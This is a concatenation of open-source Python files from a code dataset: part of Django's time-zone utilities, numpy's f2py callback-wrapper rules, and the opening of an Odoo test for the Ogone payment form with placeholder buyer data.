# This relies on os.environ['TZ'] being set to settings.TIME_ZONE.
return LocalTimezone()
# This function exists for consistency with get_current_timezone_name
def get_default_timezone_name():
"""
Returns the name of the default time zone.
"""
return _get_timezone_name(get_default_timezone())
_active = local()
def get_current_timezone():
"""
Returns the currently active time zone as a tzinfo instance.
"""
return getattr(_active, "value", get_default_timezone())
def get_current_timezone_name():
"""
Returns the name of the currently active time zone.
"""
return _get_timezone_name(get_current_timezone())
def _get_timezone_name(timezone):
"""
Returns the name of ``timezone``.
"""
try:
# for pytz timezones
return timezone.zone
except AttributeError:
# for regular tzinfo objects
return timezone.tzname(None)
# Timezone selection functions.
# These functions don't change os.environ['TZ'] and call time.tzset()
# because it isn't thread safe.
def activate(timezone):
"""
Sets the time zone for the current thread.
The ``timezone`` argument must be an instance of a tzinfo subclass or a
time zone name. If it is a time zone name, pytz is required.
"""
if isinstance(timezone, tzinfo):
_active.value = timezone
elif isinstance(timezone, six.string_types) and pytz is not None:
_active.value = pytz.timezone(timezone)
else:
raise ValueError("Invalid timezone: %r" % timezone)
def deactivate():
"""
Unsets the time zone for the current thread.
Django will then use the time zone defined by settings.TIME_ZONE.
"""
if hasattr(_active, "value"):
del _active.value
class override(ContextDecorator):
"""
Temporarily set the time zone for the current thread.
This is a context manager that uses ``~django.utils.timezone.activate()``
to set the timezone on entry, and restores the previously active timezone
on exit.
The ``timezone`` argument must be an instance of a ``tzinfo`` subclass, a
time zone name, or ``None``. If is it a time zone name, pytz is required.
If it is ``None``, Django enables the default time zone.
"""
def __init__(self, timezone):
self.timezone = timezone
def __enter__(self):
self.old_timezone = getattr(_active, 'value', None)
if self.timezone is None:
deactivate()
else:
activate(self.timezone)
def __exit__(self, exc_type, exc_value, traceback):
if self.old_timezone is None:
deactivate()
else:
_active.value = self.old_timezone
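# Illustrative usage of override, as a context manager and as a decorator
# (it subclasses ContextDecorator); the zone name assumes pytz is installed.
#
#   with override('Asia/Tokyo'):
#       local_dt = localtime(now())
#
#   @override(None)   # forces the default time zone inside report()
#   def report():
#       ...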
# Templates
def template_localtime(value, use_tz=None):
"""
Checks if value is a datetime and converts it to local time if necessary.
If use_tz is provided and is not None, that will force the value to
be converted (or not), overriding the value of settings.USE_TZ.
This function is designed for use by the template engine.
"""
should_convert = (
isinstance(value, datetime) and
(settings.USE_TZ if use_tz is None else use_tz) and
not is_naive(value) and
getattr(value, 'convert_to_local_time', True)
)
return localtime(value) if should_convert else value
# Utilities
def localtime(value, timezone=None):
"""
Converts an aware datetime.datetime to local time.
Local time is defined by the current time zone, unless another time zone
is specified.
"""
if timezone is None:
timezone = get_current_timezone()
# If `value` is naive, astimezone() will raise a ValueError,
# so we don't need to perform a redundant check.
value = value.astimezone(timezone)
if hasattr(timezone, 'normalize'):
# This method is available for pytz time zones.
value = timezone.normalize(value)
return value
def now():
"""
Returns an aware or naive datetime.datetime, depending on settings.USE_TZ.
"""
if settings.USE_TZ:
# timeit shows that datetime.now(tz=utc) is 24% slower
return datetime.utcnow().replace(tzinfo=utc)
else:
return datetime.now()
# By design, these four functions don't perform any checks on their arguments.
# The caller should ensure that they don't receive an invalid value like None.
def is_aware(value):
"""
Determines if a given datetime.datetime is aware.
The concept is defined in Python's docs:
http://docs.python.org/library/datetime.html#datetime.tzinfo
Assuming value.tzinfo is either None or a proper datetime.tzinfo,
value.utcoffset() implements the appropriate logic.
"""
return value.utcoffset() is not None
def is_naive(value):
"""
Determines if a given datetime.datetime is naive.
The concept is defined in Python's docs:
http://docs.python.org/library/datetime.html#datetime.tzinfo
Assuming value.tzinfo is either None or a proper datetime.tzinfo,
value.utcoffset() implements the appropriate logic.
"""
return value.utcoffset() is None
def make_aware(value, timezone=None, is_dst=None):
"""
Makes a naive datetime.datetime in a given time zone aware.
"""
if timezone is None:
timezone = get_current_timezone()
if hasattr(timezone, 'localize'):
# This method is available for pytz time zones.
return timezone.localize(value, is_dst=is_dst)
else:
# Check that we won't overwrite the timezone of an aware datetime.
if is_aware(value):
raise ValueError(
"make_aware expects a naive datetime, got %s" % value)
# This may be wrong around DST changes!
return value.replace(tzinfo=timezone)
def make_naive(value, timezone=None):
"""
Makes an aware datetime.datetime naive in a given time zone.
"""
if timezone is None:
timezone = get_current_timezone()
# If `value` is naive, astimezone() will raise a ValueError,
# so we don't need to perform a redundant check.
value = value.astimezone(timezone)
if hasattr(timezone, 'normalize'):
# This method is available for pytz time zones.
value = timezone.normalize(value)
return value.replace(tzinfo=None)
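# Round-trip sketch using the helpers above (values are illustrative):
#
#   from datetime import datetime
#   tz = get_fixed_timezone(60)          # UTC+01:00, works without pytz
#   naive = datetime(2015, 6, 1, 12, 0)
#   aware = make_aware(naive, tz)        # attaches tzinfo via replace()
#   assert is_aware(aware) and is_naive(naive)
#   assert make_naive(aware, tz) == naive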
| apache-2.0 |
ssanderson/numpy | numpy/f2py/cb_rules.py | 153 | 22230 | #!/usr/bin/env python
"""
Build call-back mechanism for f2py2e.
Copyright 2000 Pearu Peterson all rights reserved,
Pearu Peterson <[email protected]>
Permission to use, modify, and distribute this software is given under the
terms of the NumPy License.
NO WARRANTY IS EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK.
$Date: 2005/07/20 11:27:58 $
Pearu Peterson
"""
from __future__ import division, absolute_import, print_function
from . import __version__
from .auxfuncs import (
applyrules, debugcapi, dictappend, errmess, getargs, hasnote, isarray,
iscomplex, iscomplexarray, iscomplexfunction, isfunction, isintent_c,
isintent_hide, isintent_in, isintent_inout, isintent_nothide,
isintent_out, isoptional, isrequired, isscalar, isstring,
isstringfunction, issubroutine, l_and, l_not, l_or, outmess, replace,
stripcomma, throw_error
)
from . import cfuncs
f2py_version = __version__.version
################## Rules for callback function ##############
cb_routine_rules = {
'cbtypedefs': 'typedef #rctype#(*#name#_typedef)(#optargs_td##args_td##strarglens_td##noargs#);',
'body': """
#begintitle#
PyObject *#name#_capi = NULL;/*was Py_None*/
PyTupleObject *#name#_args_capi = NULL;
int #name#_nofargs = 0;
jmp_buf #name#_jmpbuf;
/*typedef #rctype#(*#name#_typedef)(#optargs_td##args_td##strarglens_td##noargs#);*/
#static# #rctype# #callbackname# (#optargs##args##strarglens##noargs#) {
\tPyTupleObject *capi_arglist = #name#_args_capi;
\tPyObject *capi_return = NULL;
\tPyObject *capi_tmp = NULL;
\tint capi_j,capi_i = 0;
\tint capi_longjmp_ok = 1;
#decl#
#ifdef F2PY_REPORT_ATEXIT
f2py_cb_start_clock();
#endif
\tCFUNCSMESS(\"cb:Call-back function #name# (maxnofargs=#maxnofargs#(-#nofoptargs#))\\n\");
\tCFUNCSMESSPY(\"cb:#name#_capi=\",#name#_capi);
\tif (#name#_capi==NULL) {
\t\tcapi_longjmp_ok = 0;
\t\t#name#_capi = PyObject_GetAttrString(#modulename#_module,\"#argname#\");
\t}
\tif (#name#_capi==NULL) {
\t\tPyErr_SetString(#modulename#_error,\"cb: Callback #argname# not defined (as an argument or module #modulename# attribute).\\n\");
\t\tgoto capi_fail;
\t}
\tif (F2PyCapsule_Check(#name#_capi)) {
\t#name#_typedef #name#_cptr;
\t#name#_cptr = F2PyCapsule_AsVoidPtr(#name#_capi);
\t#returncptr#(*#name#_cptr)(#optargs_nm##args_nm##strarglens_nm#);
\t#return#
\t}
\tif (capi_arglist==NULL) {
\t\tcapi_longjmp_ok = 0;
\t\tcapi_tmp = PyObject_GetAttrString(#modulename#_module,\"#argname#_extra_args\");
\t\tif (capi_tmp) {
\t\t\tcapi_arglist = (PyTupleObject *)PySequence_Tuple(capi_tmp);
\t\t\tif (capi_arglist==NULL) {
\t\t\t\tPyErr_SetString(#modulename#_error,\"Failed to convert #modulename#.#argname#_extra_args to tuple.\\n\");
\t\t\t\tgoto capi_fail;
\t\t\t}
\t\t} else {
\t\t\tPyErr_Clear();
\t\t\tcapi_arglist = (PyTupleObject *)Py_BuildValue(\"()\");
\t\t}
\t}
\tif (capi_arglist == NULL) {
\t\tPyErr_SetString(#modulename#_error,\"Callback #argname# argument list is not set.\\n\");
\t\tgoto capi_fail;
\t}
#setdims#
#pyobjfrom#
\tCFUNCSMESSPY(\"cb:capi_arglist=\",capi_arglist);
\tCFUNCSMESS(\"cb:Call-back calling Python function #argname#.\\n\");
#ifdef F2PY_REPORT_ATEXIT
f2py_cb_start_call_clock();
#endif
\tcapi_return = PyObject_CallObject(#name#_capi,(PyObject *)capi_arglist);
#ifdef F2PY_REPORT_ATEXIT
f2py_cb_stop_call_clock();
#endif
\tCFUNCSMESSPY(\"cb:capi_return=\",capi_return);
\tif (capi_return == NULL) {
\t\tfprintf(stderr,\"capi_return is NULL\\n\");
\t\tgoto capi_fail;
\t}
\tif (capi_return == Py_None) {
\t\tPy_DECREF(capi_return);
\t\tcapi_return = Py_BuildValue(\"()\");
\t}
\telse if (!PyTuple_Check(capi_return)) {
\t\tcapi_return = Py_BuildValue(\"(N)\",capi_return);
\t}
\tcapi_j = PyTuple_Size(capi_return);
\tcapi_i = 0;
#frompyobj#
\tCFUNCSMESS(\"cb:#name#:successful\\n\");
\tPy_DECREF(capi_return);
#ifdef F2PY_REPORT_ATEXIT
f2py_cb_stop_clock();
#endif
\tgoto capi_return_pt;
capi_fail:
\tfprintf(stderr,\"Call-back #name# failed.\\n\");
\tPy_XDECREF(capi_return);
\tif (capi_longjmp_ok)
\t\tlongjmp(#name#_jmpbuf,-1);
capi_return_pt:
\t;
#return#
}
#endtitle#
""",
'need': ['setjmp.h', 'CFUNCSMESS'],
'maxnofargs': '#maxnofargs#',
'nofoptargs': '#nofoptargs#',
'docstr': """\
\tdef #argname#(#docsignature#): return #docreturn#\\n\\
#docstrsigns#""",
'latexdocstr': """
{{}\\verb@def #argname#(#latexdocsignature#): return #docreturn#@{}}
#routnote#
#latexdocstrsigns#""",
'docstrshort': 'def #argname#(#docsignature#): return #docreturn#'
}
cb_rout_rules = [
{ # Init
'separatorsfor': {'decl': '\n',
'args': ',', 'optargs': '', 'pyobjfrom': '\n', 'freemem': '\n',
'args_td': ',', 'optargs_td': '',
'args_nm': ',', 'optargs_nm': '',
'frompyobj': '\n', 'setdims': '\n',
'docstrsigns': '\\n"\n"',
'latexdocstrsigns': '\n',
'latexdocstrreq': '\n', 'latexdocstropt': '\n',
'latexdocstrout': '\n', 'latexdocstrcbs': '\n',
},
'decl': '/*decl*/', 'pyobjfrom': '/*pyobjfrom*/', 'frompyobj': '/*frompyobj*/',
'args': [], 'optargs': '', 'return': '', 'strarglens': '', 'freemem': '/*freemem*/',
'args_td': [], 'optargs_td': '', 'strarglens_td': '',
'args_nm': [], 'optargs_nm': '', 'strarglens_nm': '',
'noargs': '',
'setdims': '/*setdims*/',
'docstrsigns': '', 'latexdocstrsigns': '',
'docstrreq': '\tRequired arguments:',
'docstropt': '\tOptional arguments:',
'docstrout': '\tReturn objects:',
'docstrcbs': '\tCall-back functions:',
'docreturn': '', 'docsign': '', 'docsignopt': '',
'latexdocstrreq': '\\noindent Required arguments:',
'latexdocstropt': '\\noindent Optional arguments:',
'latexdocstrout': '\\noindent Return objects:',
'latexdocstrcbs': '\\noindent Call-back functions:',
'routnote': {hasnote: '--- #note#', l_not(hasnote): ''},
}, { # Function
'decl': '\t#ctype# return_value;',
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting return_value->");'},
'\tif (capi_j>capi_i)\n\t\tGETSCALARFROMPYTUPLE(capi_return,capi_i++,&return_value,#ctype#,"#ctype#_from_pyobj failed in converting return_value of call-back function #name# to C #ctype#\\n");',
{debugcapi:
'\tfprintf(stderr,"#showvalueformat#.\\n",return_value);'}
],
'need': ['#ctype#_from_pyobj', {debugcapi: 'CFUNCSMESS'}, 'GETSCALARFROMPYTUPLE'],
'return': '\treturn return_value;',
'_check': l_and(isfunction, l_not(isstringfunction), l_not(iscomplexfunction))
},
{ # String function
'pyobjfrom': {debugcapi: '\tfprintf(stderr,"debug-capi:cb:#name#:%d:\\n",return_value_len);'},
'args': '#ctype# return_value,int return_value_len',
'args_nm': 'return_value,&return_value_len',
'args_td': '#ctype# ,int',
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting return_value->\\"");'},
"""\tif (capi_j>capi_i)
\t\tGETSTRFROMPYTUPLE(capi_return,capi_i++,return_value,return_value_len);""",
{debugcapi:
'\tfprintf(stderr,"#showvalueformat#\\".\\n",return_value);'}
],
'need': ['#ctype#_from_pyobj', {debugcapi: 'CFUNCSMESS'},
'string.h', 'GETSTRFROMPYTUPLE'],
'return': 'return;',
'_check': isstringfunction
},
{ # Complex function
'optargs': """
#ifndef F2PY_CB_RETURNCOMPLEX
#ctype# *return_value
#endif
""",
'optargs_nm': """
#ifndef F2PY_CB_RETURNCOMPLEX
return_value
#endif
""",
'optargs_td': """
#ifndef F2PY_CB_RETURNCOMPLEX
#ctype# *
#endif
""",
'decl': """
#ifdef F2PY_CB_RETURNCOMPLEX
\t#ctype# return_value;
#endif
""",
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting return_value->");'},
"""\
\tif (capi_j>capi_i)
#ifdef F2PY_CB_RETURNCOMPLEX
\t\tGETSCALARFROMPYTUPLE(capi_return,capi_i++,&return_value,#ctype#,\"#ctype#_from_pyobj failed in converting return_value of call-back function #name# to C #ctype#\\n\");
#else
\t\tGETSCALARFROMPYTUPLE(capi_return,capi_i++,return_value,#ctype#,\"#ctype#_from_pyobj failed in converting return_value of call-back function #name# to C #ctype#\\n\");
#endif
""",
{debugcapi: """
#ifdef F2PY_CB_RETURNCOMPLEX
\tfprintf(stderr,\"#showvalueformat#.\\n\",(return_value).r,(return_value).i);
#else
\tfprintf(stderr,\"#showvalueformat#.\\n\",(*return_value).r,(*return_value).i);
#endif
"""}
],
'return': """
#ifdef F2PY_CB_RETURNCOMPLEX
\treturn return_value;
#else
\treturn;
#endif
""",
'need': ['#ctype#_from_pyobj', {debugcapi: 'CFUNCSMESS'},
'string.h', 'GETSCALARFROMPYTUPLE', '#ctype#'],
'_check': iscomplexfunction
},
{'docstrout': '\t\t#pydocsignout#',
'latexdocstrout': ['\\item[]{{}\\verb@#pydocsignout#@{}}',
{hasnote: '--- #note#'}],
'docreturn': '#rname#,',
'_check': isfunction},
{'_check': issubroutine, 'return': 'return;'}
]
cb_arg_rules = [
{ # Doc
'docstropt': {l_and(isoptional, isintent_nothide): '\t\t#pydocsign#'},
'docstrreq': {l_and(isrequired, isintent_nothide): '\t\t#pydocsign#'},
'docstrout': {isintent_out: '\t\t#pydocsignout#'},
'latexdocstropt': {l_and(isoptional, isintent_nothide): ['\\item[]{{}\\verb@#pydocsign#@{}}',
{hasnote: '--- #note#'}]},
'latexdocstrreq': {l_and(isrequired, isintent_nothide): ['\\item[]{{}\\verb@#pydocsign#@{}}',
{hasnote: '--- #note#'}]},
'latexdocstrout': {isintent_out: ['\\item[]{{}\\verb@#pydocsignout#@{}}',
{l_and(hasnote, isintent_hide): '--- #note#',
l_and(hasnote, isintent_nothide): '--- See above.'}]},
'docsign': {l_and(isrequired, isintent_nothide): '#varname#,'},
'docsignopt': {l_and(isoptional, isintent_nothide): '#varname#,'},
'depend': ''
},
{
'args': {
l_and(isscalar, isintent_c): '#ctype# #varname_i#',
l_and(isscalar, l_not(isintent_c)): '#ctype# *#varname_i#_cb_capi',
isarray: '#ctype# *#varname_i#',
isstring: '#ctype# #varname_i#'
},
'args_nm': {
l_and(isscalar, isintent_c): '#varname_i#',
l_and(isscalar, l_not(isintent_c)): '#varname_i#_cb_capi',
isarray: '#varname_i#',
isstring: '#varname_i#'
},
'args_td': {
l_and(isscalar, isintent_c): '#ctype#',
l_and(isscalar, l_not(isintent_c)): '#ctype# *',
isarray: '#ctype# *',
isstring: '#ctype#'
},
# untested with multiple args
'strarglens': {isstring: ',int #varname_i#_cb_len'},
'strarglens_td': {isstring: ',int'}, # untested with multiple args
# untested with multiple args
'strarglens_nm': {isstring: ',#varname_i#_cb_len'},
},
{ # Scalars
'decl': {l_not(isintent_c): '\t#ctype# #varname_i#=(*#varname_i#_cb_capi);'},
'error': {l_and(isintent_c, isintent_out,
throw_error('intent(c,out) is forbidden for callback scalar arguments')):
''},
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting #varname#->");'},
{isintent_out:
'\tif (capi_j>capi_i)\n\t\tGETSCALARFROMPYTUPLE(capi_return,capi_i++,#varname_i#_cb_capi,#ctype#,"#ctype#_from_pyobj failed in converting argument #varname# of call-back function #name# to C #ctype#\\n");'},
{l_and(debugcapi, l_and(l_not(iscomplex), isintent_c)):
'\tfprintf(stderr,"#showvalueformat#.\\n",#varname_i#);'},
                      {l_and(debugcapi, l_and(l_not(iscomplex), l_not(isintent_c))):
'\tfprintf(stderr,"#showvalueformat#.\\n",*#varname_i#_cb_capi);'},
{l_and(debugcapi, l_and(iscomplex, isintent_c)):
'\tfprintf(stderr,"#showvalueformat#.\\n",(#varname_i#).r,(#varname_i#).i);'},
                      {l_and(debugcapi, l_and(iscomplex, l_not(isintent_c))):
'\tfprintf(stderr,"#showvalueformat#.\\n",(*#varname_i#_cb_capi).r,(*#varname_i#_cb_capi).i);'},
],
'need': [{isintent_out: ['#ctype#_from_pyobj', 'GETSCALARFROMPYTUPLE']},
{debugcapi: 'CFUNCSMESS'}],
'_check': isscalar
}, {
'pyobjfrom': [{isintent_in: """\
\tif (#name#_nofargs>capi_i)
\t\tif (PyTuple_SetItem((PyObject *)capi_arglist,capi_i++,pyobj_from_#ctype#1(#varname_i#)))
\t\t\tgoto capi_fail;"""},
{isintent_inout: """\
\tif (#name#_nofargs>capi_i)
\t\tif (PyTuple_SetItem((PyObject *)capi_arglist,capi_i++,pyarr_from_p_#ctype#1(#varname_i#_cb_capi)))
\t\t\tgoto capi_fail;"""}],
'need': [{isintent_in: 'pyobj_from_#ctype#1'},
{isintent_inout: 'pyarr_from_p_#ctype#1'},
{iscomplex: '#ctype#'}],
'_check': l_and(isscalar, isintent_nothide),
'_optional': ''
}, { # String
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting #varname#->\\"");'},
"""\tif (capi_j>capi_i)
\t\tGETSTRFROMPYTUPLE(capi_return,capi_i++,#varname_i#,#varname_i#_cb_len);""",
{debugcapi:
'\tfprintf(stderr,"#showvalueformat#\\":%d:.\\n",#varname_i#,#varname_i#_cb_len);'},
],
'need': ['#ctype#', 'GETSTRFROMPYTUPLE',
{debugcapi: 'CFUNCSMESS'}, 'string.h'],
'_check': l_and(isstring, isintent_out)
}, {
'pyobjfrom': [{debugcapi: '\tfprintf(stderr,"debug-capi:cb:#varname#=\\"#showvalueformat#\\":%d:\\n",#varname_i#,#varname_i#_cb_len);'},
{isintent_in: """\
\tif (#name#_nofargs>capi_i)
\t\tif (PyTuple_SetItem((PyObject *)capi_arglist,capi_i++,pyobj_from_#ctype#1size(#varname_i#,#varname_i#_cb_len)))
\t\t\tgoto capi_fail;"""},
{isintent_inout: """\
\tif (#name#_nofargs>capi_i) {
\t\tint #varname_i#_cb_dims[] = {#varname_i#_cb_len};
\t\tif (PyTuple_SetItem((PyObject *)capi_arglist,capi_i++,pyarr_from_p_#ctype#1(#varname_i#,#varname_i#_cb_dims)))
\t\t\tgoto capi_fail;
\t}"""}],
'need': [{isintent_in: 'pyobj_from_#ctype#1size'},
{isintent_inout: 'pyarr_from_p_#ctype#1'}],
'_check': l_and(isstring, isintent_nothide),
'_optional': ''
},
# Array ...
{
'decl': '\tnpy_intp #varname_i#_Dims[#rank#] = {#rank*[-1]#};',
'setdims': '\t#cbsetdims#;',
'_check': isarray,
'_depend': ''
},
{
'pyobjfrom': [{debugcapi: '\tfprintf(stderr,"debug-capi:cb:#varname#\\n");'},
{isintent_c: """\
\tif (#name#_nofargs>capi_i) {
\t\tPyArrayObject *tmp_arr = (PyArrayObject *)PyArray_New(&PyArray_Type,#rank#,#varname_i#_Dims,#atype#,NULL,(char*)#varname_i#,0,NPY_ARRAY_CARRAY,NULL); /*XXX: Hmm, what will destroy this array??? */
""",
l_not(isintent_c): """\
\tif (#name#_nofargs>capi_i) {
\t\tPyArrayObject *tmp_arr = (PyArrayObject *)PyArray_New(&PyArray_Type,#rank#,#varname_i#_Dims,#atype#,NULL,(char*)#varname_i#,0,NPY_ARRAY_FARRAY,NULL); /*XXX: Hmm, what will destroy this array??? */
""",
},
"""
\t\tif (tmp_arr==NULL)
\t\t\tgoto capi_fail;
\t\tif (PyTuple_SetItem((PyObject *)capi_arglist,capi_i++,(PyObject *)tmp_arr))
\t\t\tgoto capi_fail;
}"""],
'_check': l_and(isarray, isintent_nothide, l_or(isintent_in, isintent_inout)),
'_optional': '',
}, {
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting #varname#->");'},
"""\tif (capi_j>capi_i) {
\t\tPyArrayObject *rv_cb_arr = NULL;
\t\tif ((capi_tmp = PyTuple_GetItem(capi_return,capi_i++))==NULL) goto capi_fail;
\t\trv_cb_arr = array_from_pyobj(#atype#,#varname_i#_Dims,#rank#,F2PY_INTENT_IN""",
{isintent_c: '|F2PY_INTENT_C'},
""",capi_tmp);
\t\tif (rv_cb_arr == NULL) {
\t\t\tfprintf(stderr,\"rv_cb_arr is NULL\\n\");
\t\t\tgoto capi_fail;
\t\t}
\t\tMEMCOPY(#varname_i#,PyArray_DATA(rv_cb_arr),PyArray_NBYTES(rv_cb_arr));
\t\tif (capi_tmp != (PyObject *)rv_cb_arr) {
\t\t\tPy_DECREF(rv_cb_arr);
\t\t}
\t}""",
{debugcapi: '\tfprintf(stderr,"<-.\\n");'},
],
'need': ['MEMCOPY', {iscomplexarray: '#ctype#'}],
'_check': l_and(isarray, isintent_out)
}, {
'docreturn': '#varname#,',
'_check': isintent_out
}
]
################## Build call-back module #############
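# cb_map maps a module name to the list of [routine_name, callback_name]
# pairs collected while its call-back wrappers are being constructed.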
cb_map = {}
def buildcallbacks(m):
global cb_map
cb_map[m['name']] = []
for bi in m['body']:
if bi['block'] == 'interface':
for b in bi['body']:
if b:
buildcallback(b, m['name'])
else:
errmess('warning: empty body for %s\n' % (m['name']))
def buildcallback(rout, um):
global cb_map
from . import capi_maps
outmess('\tConstructing call-back function "cb_%s_in_%s"\n' %
(rout['name'], um))
args, depargs = getargs(rout)
capi_maps.depargs = depargs
var = rout['vars']
vrd = capi_maps.cb_routsign2map(rout, um)
rd = dictappend({}, vrd)
cb_map[um].append([rout['name'], rd['name']])
for r in cb_rout_rules:
if ('_check' in r and r['_check'](rout)) or ('_check' not in r):
ar = applyrules(r, vrd, rout)
rd = dictappend(rd, ar)
savevrd = {}
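    # Pass 1: apply the plain argument rules in call order; '_depend' rules
    # and the '_optional' rules for optional arguments are deferred below.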
for i, a in enumerate(args):
vrd = capi_maps.cb_sign2map(a, var[a], index=i)
savevrd[a] = vrd
for r in cb_arg_rules:
if '_depend' in r:
continue
if '_optional' in r and isoptional(var[a]):
continue
if ('_check' in r and r['_check'](var[a])) or ('_check' not in r):
ar = applyrules(r, vrd, var[a])
rd = dictappend(rd, ar)
if '_break' in r:
break
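    # Pass 2: apply the '_optional' rules, which fire only for optional args.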
for a in args:
vrd = savevrd[a]
for r in cb_arg_rules:
if '_depend' in r:
continue
if ('_optional' not in r) or ('_optional' in r and isrequired(var[a])):
continue
if ('_check' in r and r['_check'](var[a])) or ('_check' not in r):
ar = applyrules(r, vrd, var[a])
rd = dictappend(rd, ar)
if '_break' in r:
break
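    # Pass 3: apply the '_depend' rules to the dependent arguments.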
for a in depargs:
vrd = savevrd[a]
for r in cb_arg_rules:
if '_depend' not in r:
continue
if '_optional' in r:
continue
if ('_check' in r and r['_check'](var[a])) or ('_check' not in r):
ar = applyrules(r, vrd, var[a])
rd = dictappend(rd, ar)
if '_break' in r:
break
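    # When plain args coexist with the complex-return optarg, glue them with
    # a comma that exists only when F2PY_CB_RETURNCOMPLEX is not defined.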
if 'args' in rd and 'optargs' in rd:
if isinstance(rd['optargs'], list):
rd['optargs'] = rd['optargs'] + ["""
#ifndef F2PY_CB_RETURNCOMPLEX
,
#endif
"""]
rd['optargs_nm'] = rd['optargs_nm'] + ["""
#ifndef F2PY_CB_RETURNCOMPLEX
,
#endif
"""]
rd['optargs_td'] = rd['optargs_td'] + ["""
#ifndef F2PY_CB_RETURNCOMPLEX
,
#endif
"""]
if isinstance(rd['docreturn'], list):
rd['docreturn'] = stripcomma(
replace('#docreturn#', {'docreturn': rd['docreturn']}))
optargs = stripcomma(replace('#docsignopt#',
{'docsignopt': rd['docsignopt']}
))
if optargs == '':
rd['docsignature'] = stripcomma(
replace('#docsign#', {'docsign': rd['docsign']}))
else:
rd['docsignature'] = replace('#docsign#[#docsignopt#]',
{'docsign': rd['docsign'],
'docsignopt': optargs,
})
rd['latexdocsignature'] = rd['docsignature'].replace('_', '\\_')
rd['latexdocsignature'] = rd['latexdocsignature'].replace(',', ', ')
rd['docstrsigns'] = []
rd['latexdocstrsigns'] = []
for k in ['docstrreq', 'docstropt', 'docstrout', 'docstrcbs']:
if k in rd and isinstance(rd[k], list):
rd['docstrsigns'] = rd['docstrsigns'] + rd[k]
k = 'latex' + k
if k in rd and isinstance(rd[k], list):
rd['latexdocstrsigns'] = rd['latexdocstrsigns'] + rd[k][0:1] +\
['\\begin{description}'] + rd[k][1:] +\
['\\end{description}']
if 'args' not in rd:
rd['args'] = ''
rd['args_td'] = ''
rd['args_nm'] = ''
if not (rd.get('args') or rd.get('optargs') or rd.get('strarglens')):
rd['noargs'] = 'void'
ar = applyrules(cb_routine_rules, rd)
cfuncs.callbacks[rd['name']] = ar['body']
if isinstance(ar['need'], str):
ar['need'] = [ar['need']]
if 'need' in rd:
for t in cfuncs.typedefs.keys():
if t in rd['need']:
ar['need'].append(t)
cfuncs.typedefs_generated[rd['name'] + '_typedef'] = ar['cbtypedefs']
ar['need'].append(rd['name'] + '_typedef')
cfuncs.needs[rd['name']] = ar['need']
capi_maps.lcb2_map[rd['name']] = {'maxnofargs': ar['maxnofargs'],
'nofoptargs': ar['nofoptargs'],
'docstr': ar['docstr'],
'latexdocstr': ar['latexdocstr'],
'argname': rd['argname']
}
outmess('\t %s\n' % (ar['docstrshort']))
return
################## Build call-back function #############
| bsd-3-clause |
alexcuellar/odoo | addons/payment_ogone/tests/test_ogone.py | 430 | 9309 | # -*- coding: utf-8 -*-
from lxml import objectify
import time
import urlparse
from openerp.addons.payment.models.payment_acquirer import ValidationError
from openerp.addons.payment.tests.common import PaymentAcquirerCommon
from openerp.addons.payment_ogone.controllers.main import OgoneController
from openerp.tools import mute_logger
class OgonePayment(PaymentAcquirerCommon):
def setUp(self):
super(OgonePayment, self).setUp()
cr, uid = self.cr, self.uid
self.base_url = self.registry('ir.config_parameter').get_param(cr, uid, 'web.base.url')
        # get the ogone account
model, self.ogone_id = self.registry('ir.model.data').get_object_reference(cr, uid, 'payment_ogone', 'payment_acquirer_ogone')
def test_10_ogone_form_render(self):
cr, uid, context = self.cr, self.uid, {}
        # be sure not to do anything stupid
ogone = self.payment_acquirer.browse(self.cr, self.uid, self.ogone_id, None)
self.assertEqual(ogone.environment, 'test', 'test without test environment')
# ----------------------------------------
# Test: button direct rendering + shasign
# ----------------------------------------
form_values = {
'PSPID': 'dummy',
'ORDERID': 'test_ref0',
'AMOUNT': '1',
'CURRENCY': 'EUR',
'LANGUAGE': 'en_US',
'CN': 'Norbert Buyer',
'EMAIL': '[email protected]',
'OWNERZIP': '1000',
'OWNERADDRESS': 'Huge Street 2/543',
'OWNERCTY': 'Belgium',
'OWNERTOWN': 'Sin City',
'OWNERTELNO': '0032 12 34 56 78',
'SHASIGN': '815f67b8ff70d234ffcf437c13a9fa7f807044cc',
'ACCEPTURL': '%s' % urlparse.urljoin(self.base_url, OgoneController._accept_url),
'DECLINEURL': '%s' % urlparse.urljoin(self.base_url, OgoneController._decline_url),
'EXCEPTIONURL': '%s' % urlparse.urljoin(self.base_url, OgoneController._exception_url),
'CANCELURL': '%s' % urlparse.urljoin(self.base_url, OgoneController._cancel_url),
}
# render the button
res = self.payment_acquirer.render(
cr, uid, self.ogone_id,
'test_ref0', 0.01, self.currency_euro_id,
partner_id=None,
partner_values=self.buyer_values,
context=context)
# check form result
tree = objectify.fromstring(res)
self.assertEqual(tree.get('action'), 'https://secure.ogone.com/ncol/test/orderstandard.asp', 'ogone: wrong form POST url')
for form_input in tree.input:
if form_input.get('name') in ['submit']:
continue
self.assertEqual(
form_input.get('value'),
form_values[form_input.get('name')],
'ogone: wrong value for input %s: received %s instead of %s' % (form_input.get('name'), form_input.get('value'), form_values[form_input.get('name')])
)
# ----------------------------------------
# Test2: button using tx + validation
# ----------------------------------------
# create a new draft tx
tx_id = self.payment_transaction.create(
cr, uid, {
'amount': 0.01,
'acquirer_id': self.ogone_id,
'currency_id': self.currency_euro_id,
'reference': 'test_ref0',
'partner_id': self.buyer_id,
}, context=context
)
# render the button
res = self.payment_acquirer.render(
cr, uid, self.ogone_id,
'should_be_erased', 0.01, self.currency_euro,
tx_id=tx_id,
partner_id=None,
partner_values=self.buyer_values,
context=context)
# check form result
tree = objectify.fromstring(res)
self.assertEqual(tree.get('action'), 'https://secure.ogone.com/ncol/test/orderstandard.asp', 'ogone: wrong form POST url')
for form_input in tree.input:
if form_input.get('name') in ['submit']:
continue
self.assertEqual(
form_input.get('value'),
form_values[form_input.get('name')],
'ogone: wrong value for form input %s: received %s instead of %s' % (form_input.get('name'), form_input.get('value'), form_values[form_input.get('name')])
)
@mute_logger('openerp.addons.payment_ogone.models.ogone', 'ValidationError')
def test_20_ogone_form_management(self):
cr, uid, context = self.cr, self.uid, {}
        # be sure not to do anything stupid
ogone = self.payment_acquirer.browse(self.cr, self.uid, self.ogone_id, None)
self.assertEqual(ogone.environment, 'test', 'test without test environment')
